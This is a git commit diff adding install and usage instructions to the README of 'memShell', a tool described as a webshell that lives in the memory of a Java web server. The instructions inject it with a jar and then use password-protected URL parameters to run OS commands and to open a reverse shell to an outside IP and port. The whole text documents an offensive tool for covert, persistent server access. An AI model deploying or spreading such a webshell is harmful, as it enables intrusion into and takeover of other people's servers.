add install

This commit is contained in:
rebeyond
2018-05-24 20:24:01 -07:00
parent 1d10e33a34
commit 4c461fdcea
+5 -1
View File
@@ -1,7 +1,11 @@
# memShell
a webshell resides in the memory of java web server
# Usage
# install
* unzip memShell.zip
* cd memShell
* java -jar inject.jar
# usage
* anyurl?pwd=pass //show this help page.
* anyurl?pwd=pass&model=exec&cmd=whoami //run os command.
* anyurl?pwd=pass&model=connectback&ip=8.8.8.8&port=51 //reverse a shell back to 8.8.8.8 on port 51.